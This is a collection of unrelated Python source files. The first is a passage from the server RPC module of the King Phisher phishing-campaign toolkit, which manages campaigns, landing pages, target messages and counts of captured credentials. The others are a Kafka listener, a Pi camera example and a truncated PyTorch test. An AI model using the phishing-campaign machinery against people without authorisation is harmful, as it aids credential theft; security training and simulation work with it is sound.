.. warning::
This action will stop the server process and there is no
confirmation before it takes place.
"""
shutdown_thread = threading.Thread(target=handler.server.kp_shutdown)
shutdown_thread.start()
return
@register_rpc('/version', log_call=True)
def rpc_version(handler):
"""
Get the version information of the server. This returns a
dictionary with keys of version, version_info and rpc_api_version.
These values are provided for the client to determine
compatibility.
:return: A dictionary with version information.
:rtype: dict
"""
if not ipaddress.ip_address(handler.client_address[0]).is_loopback:
message = "an rpc request to /version was received from non-loopback IP address: {0}".format(handler.client_address[0])
rpc_logger.error(message)
raise errors.KingPhisherAPIError(message)
vinfo = {
'rpc_api_version': version.rpc_api_version,
'version': version.version,
'version_info': version.version_info._asdict()
}
return vinfo
@register_rpc('/config/get')
def rpc_config_get(handler, option_name):
"""
Retrieve a value from the server's configuration.
:param str option_name: The name of the configuration option.
:return: The option's value.
"""
if isinstance(option_name, (list, tuple)):
option_names = option_name
option_values = {}
for option_name in option_names:
if not option_name in CONFIG_READABLE:
raise errors.KingPhisherPermissionError('permission denied to read config option: ' + option_name)
if handler.config.has_option(option_name):
option_values[option_name] = handler.config.get(option_name)
return option_values
if not option_name in CONFIG_READABLE:
raise errors.KingPhisherPermissionError('permission denied to read config option: ' + option_name)
if handler.config.has_option(option_name):
return handler.config.get(option_name)
return
@register_rpc('/config/set')
def rpc_config_set(handler, options):
"""
Set options in the server's configuration. Any changes to the
server's configuration are not written to disk.
:param dict options: A dictionary of option names and values
"""
for option_name, option_value in options.items():
if not option_name in CONFIG_WRITEABLE:
raise errors.KingPhisherPermissionError('permission denied to write config option: ' + option_name)
handler.config.set(option_name, option_value)
return
@register_rpc('/campaign/new', database_access=True, log_call=True)
def rpc_campaign_new(handler, session, name, description=None):
"""
Create a new King Phisher campaign and initialize the database
information.
:param str name: The new campaign's name.
:param str description: The new campaign's description.
:return: The ID of the new campaign.
:rtype: int
"""
if session.query(db_models.Campaign).filter_by(name=name).count():
raise ValueError('the specified campaign name already exists')
campaign = db_models.Campaign(name=name, description=description, user_id=handler.rpc_session.user)
campaign.assert_session_has_permissions('c', handler.rpc_session)
session.add(campaign)
session.commit()
return campaign.id
@register_rpc('/campaign/alerts/is_subscribed', database_access=True, log_call=True)
def rpc_campaign_alerts_is_subscribed(handler, session, campaign_id):
"""
Check if the user is subscribed to alerts for the specified campaign.
:param int campaign_id: The ID of the campaign.
:return: The alert subscription status.
:rtype: bool
"""
query = session.query(db_models.AlertSubscription)
query = query.filter_by(campaign_id=campaign_id, user_id=handler.rpc_session.user)
return query.count()
@register_rpc('/campaign/alerts/subscribe', database_access=True, log_call=True)
def rpc_campaign_alerts_subscribe(handler, session, campaign_id):
"""
Subscribe to alerts for the specified campaign.
:param int campaign_id: The ID of the campaign.
"""
username = handler.rpc_session.user
query = session.query(db_models.AlertSubscription)
query = query.filter_by(campaign_id=campaign_id, user_id=username)
if query.count() == 0:
subscription = db_models.AlertSubscription(campaign_id=campaign_id, user_id=username)
subscription.assert_session_has_permissions('c', handler.rpc_session)
session.add(subscription)
session.commit()
@register_rpc('/campaign/alerts/unsubscribe', database_access=True, log_call=True)
def rpc_campaign_alerts_unsubscribe(handler, session, campaign_id):
"""
Unsubscribe to alerts for the specified campaign.
:param int campaign_id: The ID of the campaign.
"""
username = handler.rpc_session.user
query = session.query(db_models.AlertSubscription)
query = query.filter_by(campaign_id=campaign_id, user_id=username)
subscription = query.first()
if subscription:
subscription.assert_session_has_permissions('d', handler.rpc_session)
session.delete(subscription)
session.commit()
@register_rpc('/campaign/landing_page/new', database_access=True, log_call=True)
def rpc_campaign_landing_page_new(handler, session, campaign_id, hostname, page):
"""
Add a landing page for the specified campaign. Landing pages refer
to resources that when visited by a user should cause the visit
counter to be incremented.
:param int campaign_id: The ID of the campaign.
:param str hostname: The hostname which will be used to serve the request.
:param str page: The request resource.
"""
hostname = hostname.split(':', 1)[0]
page = page.lstrip('/')
query = session.query(db_models.LandingPage)
query = query.filter_by(campaign_id=campaign_id, hostname=hostname, page=page)
if query.count() == 0:
landing_page = db_models.LandingPage(campaign_id=campaign_id, hostname=hostname, page=page)
landing_page.assert_session_has_permissions('c', handler.rpc_session)
session.add(landing_page)
session.commit()
@register_rpc('/campaign/message/new', database_access=True, log_call=True)
def rpc_campaign_message_new(handler, session, campaign_id, email_id, target_email, first_name, last_name, department_name=None):
"""
Record a message that has been sent as part of a campaign. These
details can be retrieved later for value substitution in template
pages.
:param int campaign_id: The ID of the campaign.
:param str email_id: The message id of the sent email.
:param str target_email: The email address that the message was sent to.
:param str first_name: The first name of the message's recipient.
:param str last_name: The last name of the message's recipient.
:param str department_name: The name of the company department that the message's recipient belongs to.
"""
department = None
if department_name is not None:
department = session.query(db_models.CompanyDepartment).filter_by(name=department_name).first()
if department is None:
department = db_models.CompanyDepartment(name=department_name)
department.assert_session_has_permissions('c', handler.rpc_session)
session.add(department)
session.commit()
message = db_models.Message()
message.id = email_id
message.campaign_id = campaign_id
message.target_email = target_email
message.first_name = first_name
message.last_name = last_name
if department is not None:
message.company_department_id = department.id
message.assert_session_has_permissions('c', handler.rpc_session)
session.add(message)
session.commit()
@register_rpc('/campaign/stats', database_access=True, log_call=True)
def rpc_campaign_stats(handler, session, campaign_id):
"""
Generate statistics regarding the specified campaign and return them in a
dictionary. The dictionary will contain the keys credentials,
credentials-unique, messages, messages-trained, visits, visits-unique.
Values with unique in the key are counted unique by the message id for
which they are associated.
:param campaign_id: The unique ID of the campaign to generate statistics for.
:return: The statistics for the specified campaign.
:rtype: dict
"""
stats = {}
stats['credentials'] = session.query(db_models.Credential).filter_by(campaign_id=campaign_id).count()
stats['credentials-unique'] = session.query(db_models.Credential).filter_by(campaign_id=campaign_id).distinct(db_models.Credential.message_id).count()
stats['messages'] = session.query(db_models.Message).filter_by(campaign_id=campaign_id).count()
stats['messages-trained'] = session.query(db_models.Message).filter_by(campaign_id=campaign_id, trained=True).count()
stats['visits'] = session.query(db_models.Visit).filter_by(campaign_id=campaign_id).count()
stats['visits-unique'] = session.query(db_models.Visit).filter_by(campaign_id=campaign_id).distinct(db_models.Visit.message_id).count()
return stats
@register_rpc('/db/table/count', database_access=True)
def rpc_database_count_rows(handler, session, table_name, query_filter=None):
"""
Get a count of the rows in the specified table where the search
criteria matches.
:param str table_name: The name of the database table to query.
:param dict query_filter: A dictionary mapping optional search criteria for matching the query.
:return: The number of matching rows.
:rtype: int
"""
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
query_filter = query_filter or {}
columns = database_tables[table_name]
for column in query_filter.keys():
if column not in columns:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(column, table_name))
query = session.query(table)
query = query.filter_by(**query_filter)
return query.count()
@register_rpc('/db/table/view', database_access=True)
def rpc_database_view_rows(handler, session, table_name, page=0, query_filter=None):
"""
Retrieve the rows from the specified table where the search
criteria matches.
:param str table_name: The name of the database table to query.
:param int page: The page number to retrieve results for.
:param dict query_filter: A dictionary mapping optional search criteria for matching the query.
:return: A dictionary with columns and rows keys.
:rtype: dict
"""
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
query_filter = query_filter or {}
columns = database_tables[table_name]
for column in query_filter.keys():
if column not in columns:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(column, table_name))
offset = page * VIEW_ROW_COUNT
# it's critical that the columns are in the order that the client is expecting
rows = []
query = session.query(table)
query = query.filter_by(**query_filter)
total_rows = query.count()
for row in query[offset:]:
if len(rows) == VIEW_ROW_COUNT:
break
if row.session_has_permissions('r', handler.rpc_session):
rows.append([getattr(row, c) for c in columns])
if not len(rows):
return None
return {'columns': columns, 'rows': rows, 'total_rows': total_rows, 'page_size': VIEW_ROW_COUNT}
@register_rpc('/db/table/delete', database_access=True, log_call=True)
def rpc_database_delete_row_by_id(handler, session, table_name, row_id):
"""
Delete the row from the table with the specified value in the id column.
If the row does not exist, no error is raised.
:param str table_name: The name of the database table to delete a row from.
:param row_id: The id value.
"""
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
row = db_manager.get_row_by_id(session, table, row_id)
if row is None:
logger = logging.getLogger('KingPhisher.Server.API.RPC')
logger.debug("received delete request for non existing row with id {0} from table {1}".format(row_id, table_name))
return
row.assert_session_has_permissions('d', handler.rpc_session)
session.delete(row)
session.commit()
@register_rpc('/db/table/delete/multi', database_access=True, log_call=True)
def rpc_database_delete_rows_by_id(handler, session, table_name, row_ids):
"""
Delete multiple rows from a table with the specified values in the id
column. If a row id specified in *row_ids* does not exist, then it will
be skipped and no error will be thrown.
:param str table_name: The name of the database table to delete rows from.
:param list row_ids: The row ids to delete.
:return: The row ids that were deleted.
:rtype: list
"""
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
deleted_rows = []
for row_id in row_ids:
row = db_manager.get_row_by_id(session, table, row_id)
if not row:
continue
if not row.session_has_permissions('d', handler.rpc_session):
continue
session.delete(row)
deleted_rows.append(row_id)
session.commit()
return deleted_rows
@register_rpc('/db/table/get', database_access=True)
def rpc_database_get_row_by_id(handler, session, table_name, row_id):
"""
Retrieve a row from a given table with the specified value in the
id column.
:param str table_name: The name of the database table to retrieve a row from.
:param row_id: The id value.
:return: The specified row data.
:rtype: dict
"""
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
columns = database_tables[table_name]
row = db_manager.get_row_by_id(session, table, row_id)
if row:
row.assert_session_has_permissions('r', handler.rpc_session)
row = dict(zip(columns, (getattr(row, c) for c in columns)))
return row
@register_rpc('/db/table/insert', database_access=True)
def rpc_database_insert_row(handler, session, table_name, keys, values):
"""
Insert a new row into the specified table.
:param str table_name: The name of the database table to insert a new row into.
:param list keys: The column names of *values*.
:param list values: The values to be inserted in the row.
:return: The id of the new row that has been added.
"""
if not isinstance(keys, (list, tuple)):
keys = (keys,)
if not isinstance(values, (list, tuple)):
values = (values,)
if len(keys) != len(values):
raise errors.KingPhisherAPIError('the number of keys does not match the number of values')
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
for key in keys:
if key not in database_tables[table_name]:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(key, table_name))
row = table()
for key, value in zip(keys, values):
setattr(row, key, value)
row.assert_session_has_permissions('c', handler.rpc_session)
session.add(row)
session.commit()
return row.id
@register_rpc('/db/table/insert/multi', database_access=True)
def rpc_database_insert_row_multi(handler, session, table_name, keys, rows, deconflict_ids=False):
"""
Insert multiple new rows into the specified table. If *deconflict_ids* is
true, new id values will be assigned as necessary to merge the data into
the database. This function will fail if constraints for the table are
not met.
:param str table_name: The name of the database table to insert data into.
:param list keys: The column names of the values in *rows*.
:param list rows: A list of rows, each row is a list of values ordered and identified by *keys* to be inserted.
:return: List of ids of the newly inserted rows.
:rtype: list
"""
inserted_rows = collections.deque()
if not isinstance(keys, list):
keys = list(keys)
if not isinstance(rows, list):
rows = list(rows)
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError('failed to get table object for: {0}'.format(table_name))
for key in keys:
if key not in database_tables[table_name]:
raise errors.KingPhisherAPIError('column {0} is invalid for table {1}'.format(keys, table_name))
for row in rows:
if len(row) != len(keys):
raise errors.KingPhisherAPIError('row is not the same length as the number of values defined')
row = dict(zip(keys, row))
if 'id' in row and db_manager.get_row_by_id(session, table, row['id']) is not None:
if deconflict_ids:
row['id'] = None
else:
raise errors.KingPhisherAPIError('row id conflicts with an existing value')
table_row = table(**row)
table_row.assert_session_has_permissions('c', handler.rpc_session)
session.add(table_row)
inserted_rows.append(table_row)
session.commit()
return [row.id for row in inserted_rows]
@register_rpc('/db/table/set', database_access=True)
def rpc_database_set_row_value(handler, session, table_name, row_id, keys, values):
"""
Set values for a row in the specified table with an id of *row_id*.
:param str table_name: The name of the database table to set the values of the specified row.
:param tuple keys: The column names of *values*.
:param tuple values: The values to be updated in the row.
"""
if not isinstance(keys, (list, tuple)):
keys = (keys,)
if not isinstance(values, (list, tuple)):
values = (values,)
if len(keys) != len(values):
raise errors.KingPhisherAPIError('the number of keys does not match the number of values')
table = database_table_objects.get(table_name)
if not table:
raise errors.KingPhisherAPIError("failed to get table object for: {0}".format(table_name))
for key, value in zip(keys, values):
if key not in database_tables[table_name]:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(key, table_name))
row = db_manager.get_row_by_id(session, table, row_id)
if not row:
raise errors.KingPhisherAPIError("failed to get row id: {0} from table: {1}".format(row_id, table_name))
row.assert_session_has_permissions('u', handler.rpc_session)
for key, value in zip(keys, values):
setattr(row, key, value)
row.assert_session_has_permissions('u', handler.rpc_session)
session.commit()
@register_rpc('/events/is_subscribed', log_call=True)
def rpc_events_is_subscribed(handler, event_id, event_type):
"""
Check if the client is currently subscribed to the specified server event.
:param str event_id: The identifier of the event to subscribe to.
:param str event_type: A sub-type for the corresponding event.
:return: Whether or not the client is subscribed to the event.
:rtype: bool
"""
if not isinstance(event_id, str):
raise errors.KingPhisherAPIError('a valid event id must be specified')
if not isinstance(event_type, str):
raise errors.KingPhisherAPIError('a valid event type must be specified')
event_socket = handler.rpc_session.event_socket
if event_socket is None:
raise errors.KingPhisherAPIError('the event socket is not open for this session')
return event_socket.is_subscribed(event_id, event_type)
@register_rpc('/events/subscribe', log_call=True)
def rpc_events_subscribe(handler, event_id, event_types=None, attributes=None):
"""
Subscribe the client to the specified event published by the server.
When the event is published the specified *attributes* of it and it's
corresponding id and type information will be sent to the client.
:param str event_id: The identifier of the event to subscribe to.
:param list event_types: A list of sub-types for the corresponding event.
:param list attributes: A list of attributes of the event object to be sent to the client.
"""
if not isinstance(event_id, str):
raise errors.KingPhisherAPIError('a valid event id must be specified')
event_socket = handler.rpc_session.event_socket
if event_socket is None:
raise errors.KingPhisherAPIError('the event socket is not open for this session')
if not event_id.startswith('db-'):
# db-<table name> events are the only ones that are valid right now
raise errors.KingPhisherAPIError('invalid event_id: ' + event_id)
table_name = event_id[3:]
table_name = table_name.replace('-', '_')
columns = database_tables.get(table_name)
if columns is None:
raise errors.KingPhisherAPIError("invalid table object: {0}".format(table_name))
for event_type in event_types:
if event_type not in ('deleted', 'inserted', 'updated'):
raise errors.KingPhisherAPIError("event type {0} is invalid for db-* events".format(event_type))
for column in attributes:
if column not in columns:
raise errors.KingPhisherAPIError("column {0} is invalid for table {1}".format(column, table_name))
return event_socket.subscribe(event_id, event_types=event_types, attributes=attributes)
@register_rpc('/events/unsubscribe', log_call=True)
def rpc_events_unsubscribe(handler, event_id, event_types=None, attributes=None):
"""
Unsubscribe from an event published by the server that the client
previously subscribed to.
:param str event_id: The identifier of the event to subscribe to.
:param list event_types: A list of sub-types for the corresponding event.
:param list attributes: A list of attributes of the event object to be sent to the client.
"""
if not isinstance(event_id, str):
raise errors.KingPhisherAPIError('a valid event id must be specified')
event_socket = handler.rpc_session.event_socket
if event_socket is None:
raise errors.KingPhisherAPIError('the event socket is not open for this session')
return event_socket.unsubscribe(event_id, event_types=event_types, attributes=attributes)
@register_rpc('/geoip/lookup', log_call=True)
def rpc_geoip_lookup(handler, ip, lang=None):
"""
Look up an IP address in the servers GeoIP database. If the IP address
can not be found in the database, None will be returned.
:param str ip: The IP address to look up.
:param str lang: The language to prefer for regional names.
:return: The geographic information for the specified IP address.
:rtype: dict
"""
try:
result = geoip.lookup(ip, lang=lang)
except geoip.AddressNotFoundError:
result = None
return result
@register_rpc('/geoip/lookup/multi', log_call=True)
def rpc_geoip_lookup_multi(handler, ips, lang=None):
"""
Look up multiple IP addresses in the servers GeoIP database. Each IP
address that can not be found in the database will have its result set
to None.
:param list ips: The list of IP addresses to look up.
:param str lang: The language to prefer for regional names.
:return: A dictionary containing the results keyed by the specified IP
addresses.
:rtype: dict
"""
results = {}
for ip in ips:
try:
result = geoip.lookup(ip, lang=lang)
except geoip.AddressNotFoundError:
result = None
results[ip] = result
return results
@register_rpc('/login', database_access=True)
def rpc_login(handler, session, username, password, otp=None):
logger = logging.getLogger('KingPhisher.Server.Authentication')
if not ipaddress.ip_address(handler.client_address[0]).is_loopback:
logger.warning("failed login request from {0} for user {1}, (invalid source address)".format(handler.client_address[0], username))
raise ValueError('invalid source address for login')
fail_default = (False, ConnectionErrorReason.ERROR_INVALID_CREDENTIALS, None)
fail_otp = (False, ConnectionErrorReason.ERROR_INVALID_OTP, None)
if not (username and password):
logger.warning("failed login request from {0} for user {1}, (missing username or password)".format(handler.client_address[0], username))
return fail_default
if not handler.server.forked_authenticator.authenticate(username, password):
logger.warning("failed login request from {0} for user {1}, (authentication failed)".format(handler.client_address[0], username))
return fail_default
user = db_manager.get_row_by_id(session, db_models.User, username)
if not user:
logger.info('creating new user object with id: ' + username)
user = db_models.User(id=username)
session.add(user)
session.commit()
elif user.otp_secret:
if otp is None:
logger.debug("failed login request from {0} for user {1}, (missing otp)".format(handler.client_address[0], username))
return fail_otp
if not (isinstance(otp, str) and len(otp) == 6 and otp.isdigit()):
logger.warning("failed login request from {0} for user {1}, (invalid otp)".format(handler.client_address[0], username))
return fail_otp
totp = pyotp.TOTP(user.otp_secret)
now = datetime.datetime.now()
if not otp in (totp.at(now + datetime.timedelta(seconds=offset)) for offset in (0, -30, 30)):
logger.warning("failed login request from {0} for user {1}, (invalid otp)".format(handler.client_address[0], username))
return fail_otp
session_id = handler.server.session_manager.put(username)
logger.info("successful login request from {0} for user {1}".format(handler.client_address[0], username))
signals.rpc_user_logged_in.send(handler, session=session_id, name=username)
return True, ConnectionErrorReason.SUCCESS, session_id
@register_rpc('/logout', log_call=True)
def rpc_logout(handler):
rpc_session = handler.rpc_session
if rpc_session.event_socket is not None:
rpc_session.event_socket.close()
handler.server.session_manager.remove(handler.rpc_session_id)
logger = logging.getLogger('KingPhisher.Server.Authentication')
logger.info("successful logout request from {0} for user {1}".format(handler.client_address[0], rpc_session.user))
signals.rpc_user_logged_out.send(handler, session=handler.rpc_session_id, name=rpc_session.user)
@register_rpc('/plugins/list', log_call=True)
def rpc_plugins_list(handler):
"""
Return information regarding enabled plugins in the server.
:return: A dictionary representing enabled plugins and their meta-data.
:rtype: dict
"""
plugin_manager = handler.server.plugin_manager
plugins = {}
for _, plugin in plugin_manager:
plugins[plugin.name] = {
'description': plugin.formatted_description,
'name': plugin.name,
'title': plugin.title,
'version': plugin.version
}
return plugins
@register_rpc('/graphql', database_access=True)
def rpc_graphql(handler, session, query, query_vars=None):
"""
Execute a GraphQL query and return the results. If the query fails to
execute the errors returned are populated in the **errors** key of the
results dictionary. If the query executes successfully the returned data
is available in the **data** key of the results dictionary.
:param str query: The GraphQL query to execute.
:param dict query_vars: Any variables needed by the *query*.
:return: The results of the query as a dictionary.
:rtype: dict
"""
query_vars = query_vars or {}
result = graphql.schema.execute(
query,
context_value={
'plugin_manager': handler.server.plugin_manager,
'rpc_session': handler.rpc_session,
'session': session
},
variable_values=query_vars
)
errors = None
if result.errors:
errors = []
for error in result.errors:
if hasattr(error, 'message'):
errors.append(error.message)
elif hasattr(error, 'args') and error.args:
errors.append(str(error.args[0]))
else:
errors.append(repr(error))
return {'data': result.data, 'errors': errors}
|
event_bus.py
|
import json
import logging
import threading
from typing import List, Type
from kafka import KafkaConsumer
from fractal.core.command_bus.command_bus import CommandBus
from fractal.core.event_sourcing.event import ReceivingEvent
from fractal.core.event_sourcing.event_bus import EventBus
from fractal.core.event_sourcing.message import Message
logger = logging.getLogger("app")
class KafkaEventBus(EventBus):
def __init__(
self,
command_bus: CommandBus,
host,
port,
username,
password,
service_name: str,
aggregate: str,
event_classes: List[Type[ReceivingEvent]],
use_thread=False,
):
listener = KafkaEventBusListener(
command_bus,
host,
port,
username,
password,
service_name,
aggregate,
event_classes,
)
if use_thread: # TODO should run in separate container
thread = threading.Thread(target=listener.run)
thread.setDaemon(True)
thread.start()
else:
listener.run()
class KafkaEventBusListener:
def __init__(
self,
command_bus: CommandBus,
host,
port,
username,
password,
service_name: str,
aggregate: str,
event_classes,
):
self.command_bus = command_bus
self.bootstrap_servers = f"{host}:{port}"
self.event_classes = {i.__name__: i for i in event_classes}
self.service_name = service_name
self.aggregate = aggregate
def run(self):
topic = f"{self.service_name}.{self.aggregate}"
logger.info(f"Listening to RabbitMq queue: {topic}")
consumer = KafkaConsumer(topic, bootstrap_servers=self.bootstrap_servers)
for message in consumer:
logger.info(f"Received message: {message}")
message = Message(**json.loads(message.value))
event = self.event_classes[message.event](**json.loads(message.data))
logger.info("Received event: {}".format(event))
command = event.to_command()
if command:
self.command_bus.handle(command)
|
multiproc_camera.py
|
import os
import io
import time
import multiprocessing as mp
from queue import Empty
import picamera
from PIL import Image
class QueueOutput(object):
def __init__(self, queue, finished):
self.queue = queue
self.finished = finished
self.stream = io.BytesIO()
def write(self, buf):
if buf.startswith(b'\xff\xd8'):
# New frame, put the last frame's data in the queue
size = self.stream.tell()
if size:
self.stream.seek(0)
self.queue.put(self.stream.read(size))
self.stream.seek(0)
self.stream.write(buf)
def flush(self):
self.queue.close()
self.queue.join_thread()
self.finished.set()
def do_capture(queue, finished):
with picamera.PiCamera(resolution='VGA', framerate=30) as camera:
output = QueueOutput(queue, finished)
camera.start_recording(output, format='mjpeg')
camera.wait_recording(10)
camera.stop_recording()
def do_processing(queue, finished):
while not finished.wait(0.1):
try:
stream = io.BytesIO(queue.get(False))
except Empty:
pass
else:
stream.seek(0)
image = Image.open(stream)
# Pretend it takes 0.1 seconds to process the frame; on a quad-core
# Pi this gives a maximum processing throughput of 40fps
time.sleep(0.1)
print('%d: Processing image with size %dx%d' % (
os.getpid(), image.size[0], image.size[1]))
if __name__ == '__main__':
queue = mp.Queue()
finished = mp.Event()
capture_proc = mp.Process(target=do_capture, args=(queue, finished))
processing_procs = [
mp.Process(target=do_processing, args=(queue, finished))
for i in range(4)
]
for proc in processing_procs:
proc.start()
capture_proc.start()
for proc in processing_procs:
proc.join()
capture_proc.join()
|
dist_autograd_test.py
|
import sys
import threading
import time
from enum import Enum
import random
import torch
import torch.nn as nn
from datetime import timedelta
import torch.distributed as dist
import torch.distributed.autograd as dist_autograd
import torch.distributed.rpc as rpc
import torch.testing._internal.dist_utils
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.distributed.rpc import RRef
from torch.testing._internal.common_utils import IS_MACOS, sandcastle_skip_if
from torch.testing._internal.dist_utils import (
dist_init,
initialize_pg,
wait_until_node_failure,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_distributed import skip_if_lt_x_gpu
# Right now we test up to 3-layer nested rpc calls.
# rpc_done[1] and ctx_ids[1] represent rpc is done in prev rank, and context id
# sent from prev rank respectively.
# rpc_done[2] and ctx_ids[2] represents for prev of prev rank.
# rpc_done[3] and ctx_ids[3] represents for prev of prev of prev rank.
# rpc_done[0] and ctx_ids[0] represents for current rank, but mostly not used.
rpc_done = [False, False, False, False]
ctx_ids = [-1, -1, -1, -1]
known_context_ids = set()
requires_grad_tensor = torch.ones(3, 3, requires_grad=True)
# Send rpc done info and context_id to
# dst_rank = (self.rank + rank_distance) % self.world_size
# we don't need a lock here since the GIL is held while executing remote
# python UDFs, so access is serialized across several workers.
def _set_rpc_done(ctx_id, rank_distance):
global rpc_done
global ctx_ids
global known_context_ids
rpc_done[rank_distance] = True
ctx_ids[rank_distance] = ctx_id
known_context_ids.add(ctx_id)
def _check_rpc_done(rank_distance):
while not rpc_done[rank_distance]:
time.sleep(0.1)
def _torch_ones(sizes, requires_grad=False):
return torch.ones(sizes, requires_grad=requires_grad)
# This method must be called on the rref owner, and verifies that the grad of
# rref tensor equals to the given grad.
def _compare_owner_value(context_id, rref, grad):
grads = dist_autograd.get_gradients(context_id)
return torch.equal(grads[rref.local_value()], grad)
def create_tensor():
return torch.ones((3, 3), requires_grad=True)
@torch.jit.script
def create_torchscript_tensor() -> torch.Tensor:
return torch.ones((3, 3)).requires_grad_()
def my_py_add(t1, t2):
return torch.add(t1, t2)
def my_scalar_add(a, b):
return a + b
def my_rref_add(rref_t1, t2):
ret = torch.add(rref_t1.local_value(), t2)
return ret
@torch.jit.script
def my_script_add(t1, t2):
return torch.add(t1, t2)
@torch.jit.script
def my_script_ref_add(ref_t1: RRef[torch.Tensor], t2: torch.Tensor) -> torch.Tensor:
t1 = ref_t1.to_here()
return torch.add(t1, t2)
def my_nested_rref_add(dst, rref_t1, t2):
return rpc.rpc_sync(dst, my_rref_add, args=(rref_t1, t2))
def ret_requires_grad():
return requires_grad_tensor
def my_py_nested_call(t1, t2, dst, world_size, hops):
next_dst = (dst + 1) % world_size
if hops > 0:
return rpc.rpc_sync(
worker_name(next_dst),
my_py_nested_call,
args=(t1, t2, next_dst, world_size, hops - 1),
)
else:
return rpc.rpc_sync(worker_name(next_dst), my_py_add, args=(t1, t2))
# after dist autograd context is cleaned up, it should be cleaned up on other
# nodes. This helper allows timeout_seconds for those RPCs to be completed, and
# ensures that all the contexts have been cleaned up in that timeframe.any
def _all_contexts_cleaned_up(timeout_seconds=10):
global known_context_ids
start = time.time()
context_id_to_raised = set()
while (
time.time() - start < timeout_seconds
and context_id_to_raised != known_context_ids
):
for context_id in known_context_ids:
try:
dist_autograd._retrieve_context(context_id)
except RuntimeError:
context_id_to_raised.add(context_id)
# all contexts have been cleaned up if trying to retrieve any context resulted in a RuntimeError.
success = context_id_to_raised == known_context_ids
return success
# This function creates a dis atugorad context, run rpc_sync on the given ps,
# and then blocks until the ps has verified the grads are correctly accumulated.
def _run_trainer(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_rref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
# This function is the same as _run_trainer, except rpc calls torchscript
# function "my_script_ref_add" instead of python funciton "my_rref_add"
def _run_trainer_torchscript(rref_t1, t2, ps, rank_diff):
with dist_autograd.context() as context_id:
ret = rpc.rpc_sync(ps, my_script_ref_add, args=(rref_t1, t2))
dist_autograd.backward(context_id, [ret.sum()])
# prevent deleting dist autograd context
rpc.rpc_sync(ps, _set_rpc_done, args=(context_id, rank_diff))
rpc.rpc_sync(ps, _check_rpc_done, args=(0,))
class SimulateBackwardError(Function):
_simulate_error = True
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
if SimulateBackwardError._simulate_error:
raise Exception("Simulate error on backward pass")
else:
return input
class ExecMode(Enum):
LOCAL = 1 # Run the operation locally.
RPC_SYNC = 2 # Run the operation using rpc_sync
REMOTE = 3 # Run the operation using remote.
RPC_ASYNC = 4 # Run the operation using rpc_async
# Common utils for both CPU and CUDA test suites
class CommonDistAutogradTest(RpcAgentTestFixture):
def _exec_func_with_dst(self, dst, exec_mode, method, *args):
if ExecMode.LOCAL == exec_mode:
if len(args) == 1 and isinstance(args[0], list):
return method(*args[0])
return method(*args)
elif ExecMode.RPC_SYNC == exec_mode:
return rpc.rpc_sync(worker_name(dst), method, args=(args))
elif ExecMode.REMOTE == exec_mode:
return rpc.remote(worker_name(dst), method, args=(args)).to_here()
elif ExecMode.RPC_ASYNC == exec_mode:
fut = rpc.rpc_async(worker_name(dst), method, args=(args))
return fut.wait()
else:
raise ValueError("Unrecognized ExecMode {}".format(exec_mode))
def _exec_func(self, exec_mode, method, *args):
return self._exec_func_with_dst(
self._next_rank(), exec_mode, method, *args
)
def _next_rank(self):
if hasattr(self, "dst_rank"):
self.dst_rank = (self.dst_rank + 1) % self.world_size
if self.dst_rank == self.rank:
return self._next_rank()
else:
self.dst_rank = (self.rank + 1) % self.world_size
return self.dst_rank
def _check_rpc_done(self, rank_distance):
_check_rpc_done(rank_distance)
def _verify_backwards(self, exec_mode, tensors, context_id, local_grads, *args):
if exec_mode == ExecMode.LOCAL:
torch.autograd.backward(tensors)
return [arg.grad for arg in args]
else:
self._verify_backwards_remote(tensors, context_id, local_grads, *args)
def _verify_backwards_remote(self, tensors, context_id, local_grads, *args):
dist_autograd.backward(context_id, tensors)
# Verify grads were accumulated appropriately.
grads = dist_autograd.get_gradients(context_id)
nargs = len(args)
ngrads = 0
for i in range(0, nargs):
if local_grads[i] is not None:
self.assertIn(args[i], grads)
self.assertEqual(local_grads[i], grads[args[i]])
ngrads += 1
else:
self.assertNotIn(args[i], grads)
self.assertEqual(ngrads, len(grads))
class DistAutogradTest(CommonDistAutogradTest):
@dist_init
def test_autograd_context(self):
# Verify max possible id.
max_auto_increment = 281474976710655
self.assertEqual(
max_auto_increment + (self.worker_id << 48), dist_autograd._get_max_id()
)
context_ids = []
for i in range(200):
with dist_autograd.context() as context_id:
self.assertEqual(
context_id,
dist_autograd._retrieve_context(context_id)._context_id(),
)
# First 16 bits should be worker_id.
self.assertEqual(self.worker_id, context_id >> 48)
context_ids.append(context_id)
for context_id in context_ids:
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd._retrieve_context(context_id)
@dist_init
def test_nested_context(self):
with dist_autograd.context() as context_id:
# Nested contexts not supported.
with self.assertRaisesRegex(
RuntimeError, "Already have an autograd context id for this thread"
):
with dist_autograd.context() as context_id:
pass
# For current context, this rank sends t1 and t2 tensors to dst_rank,
# then get t3 = torch.add(t1, t2) result tensor.
# For the current context in this rank, it expects graph like this:
# send function:
# rpcSendBackward
# / \
# t1.AccumulateGrad t2.AccumulateGrad
#
# recv function:
#
# |
